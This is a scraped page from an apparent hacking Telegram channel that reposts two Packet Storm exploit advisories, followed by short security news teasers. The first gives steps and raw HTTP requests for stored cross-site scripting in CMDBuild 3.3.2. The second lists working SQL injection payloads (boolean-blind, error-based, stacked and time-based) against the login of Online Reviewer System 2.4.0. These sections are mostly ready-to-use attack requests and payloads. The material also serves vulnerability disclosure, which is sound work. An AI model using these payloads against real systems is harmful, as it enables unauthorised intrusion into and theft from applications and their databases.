Hacking Articles Tips Tricks Videos Tutorials
468 subscribers
65.9K photos
15 videos
157 files
132K links
Exploit
Pentesting
Hacking
Red Team
Blue Team
Kali Linux
Bug Bounty
Black Hat
Cyber security etc

@Hacking_Video
@Hacking_attack
Download Telegram
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
CMDBuild 3.3.2 Cross Site Scripting

https://3.bp.blogspot.com/-sRAbWielMtM/WWlvVvmDA-I/AAAAAAAAIN8/PunzJUFKKskcHl_zTOrA6xP6ETTvhbejQCLcBGAs/s1600/h46.png
CMDBuild version 3.3.2 suffers from cross site scripting vulnerabilities.

MD5 | 5c78cbeb9008e6af507f9096fd21c949

Download
# Exploit Title: CMDBuild 3.3.2 - 'Multiple' Cross Site Scripting (XSS)
# Date: 15/11/2021
# Exploit Author: Hosein Vita
# Vendor Homepage: https://www.cmdbuild.org
# Software Link: https://www.cmdbuild.org/en/download/latest-version
# Version: CMDBuild 3.3.2
# Tested on: Linux

Summary:

Multiple stored cross-site scripting (XSS) vulnerabilities in Tecnoteca CMDBuild 3.3.1 allow remote attackers to inject arbitrary web script or HTML via a crafted SVG document. The attack vectors include Add Attachment, Add Office, and Add Employee. Almost all add sections

Proof of concepts :

Stored Xss Example:

1-Login to you'r Dashboard As a low privilege user
2-Click On Basic archives and Employee
3- +Add card Employee
4- Enter your xss payload in parameters
5-On added employee click on "Open Relation Graph"

POST /cmdbuild/services/rest/v3/classes/Employee/cards?_dc=1636978977758 HTTP/1.1
...
Cmdbuild-Actionid: class.card.new.open
Cmdbuild-Requestid: f487ca06-3678-425f-8606-c6b671145353

Cmdbuild-Clientid: WL3L4mteNCU51FxhSQVzno3K
X-Requested-With: XMLHttpRequest
Content-Length: 302
Connection: close

{"_type":"Employee","_tenant":"","Code":"\">x ","Description":null,"Surname":"\">x ","Name":"\">x ","Type":null,"Qualification":null,"Level":null,"Email":null,"Office":null,"Phone":null,"Mobile":null,"Fax":null,"State":null}
------------------------------------------------------------------------
File upload Xss example:

1-Click on Basic archives
2-Click on Workplace - + Add card Workplace
3-Select "attachments" icon - +Add attachment + image
4-Upload your svg file with xss payload
5-Click on preview and Right click open in new tab
Request:
POST /cmdbuild/services/rest/v3/classes/Workplace/cards/271248/attachments HTTP/1.1
Cmdbuild-Actionid: class.card.attachments.open

-----------------------------269319782833689825543405205260
Content-Disposition: form-data; name="file"; filename="kiwi.svg"
Content-Type: image/svg+xml



Source:packetstormsecurity.com

___________________________
@hacking_Attack
@Hacking_Video
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
Online Reviewer System 2.4.0 SQL Injection

https://1.bp.blogspot.com/-93ZP4TpCwBw/WWlu7wGG0SI/AAAAAAAAIJg/yDCONAkAMz8MX1TtbGL6KFo1njFu_UyvACLcBGAs/s1600/h111.png
Online Reviewer System version 2.4.0 suffers from a remote SQL injection vulnerability.

MD5 | e0d67c854d6f65ba496fbc8683da167c

Download
## [Sourcecodester-Online-Reviewer-System-2.4.0 SQL - 4 types of
injection vulnerability](https://www.sourcecodester.com/php/12937/online-reviewer-system-using-phppdo.html)

## [Vendor](https://www.sourcecodester.com/users/janobe)

## Description:
The password parameter appears of the Online Reviewer System 1.0 to be
vulnerable to SQL injection attacks - 4 types of injection
vulnerability.
A single quote was submitted in the password parameter, and a database
error message was returned.
Two single quotes were then submitted and the error message disappeared.

## Payloads:

```mysql
---
Parameter: username (POST)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)
Payload: username=TtzgjjZP' OR NOT
2693=2693#&password=r1L!h4v!O1'&btn-login=Log In

Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or
GROUP BY clause (FLOOR)
Payload: username=TtzgjjZP' AND (SELECT 4139 FROM(SELECT
COUNT(*),CONCAT(0x71707a7171,(SELECT
(ELT(4139=4139,1))),0x71707a7a71,FLOOR(RAND(0)*2))x FROM
INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)--
GJJK&password=r1L!h4v!O1'&btn-login=Log In

Type: stacked queries
Title: MySQL >= 5.0.12 stacked queries (comment)
Payload: username=TtzgjjZP';SELECT
SLEEP(5)#&password=r1L!h4v!O1'&btn-login=Log In

Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: username=TtzgjjZP' AND (SELECT 8716 FROM
(SELECT(SLEEP(5)))MJXH)-- xWIO&password=r1L!h4v!O1'&btn-login=Log In
---
```

Source:packetstormsecurity.com

___________________________
@hacking_Attack
@Hacking_Video
Dark Reading: Attacks/Breaches
Navigating the Complexity of Today's Digital Supply Chain

An efficient way to monitor security is to model user behavior using time series data and watching for anomalies.
Dark Reading: Attacks/Breaches
4 Considerations for Improving Cloud Security Hygiene

Mixing cloud security and maintenance practices with legacy enterprise approaches usually ends up shortchanging cloud hygiene. Here are some ways to remedy that.
Interview with hacker and content creator NahamSecContinue reading on ShiftLeft Blog » (https://blog.shiftleft.io/live-streaming-a-hackers-mind-7f0c0504bc04?source=rss------bug_bounty-5)
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
Red Team OSINT

https://cdn-images-1.medium.com/max/623/1*CGsaD1QxlsARq4N80op-4w.jpeg
The main goal of reconnaissance is collecting data about the target of the red team assessment. Since the red team wishes to remain…

Continue reading on Medium »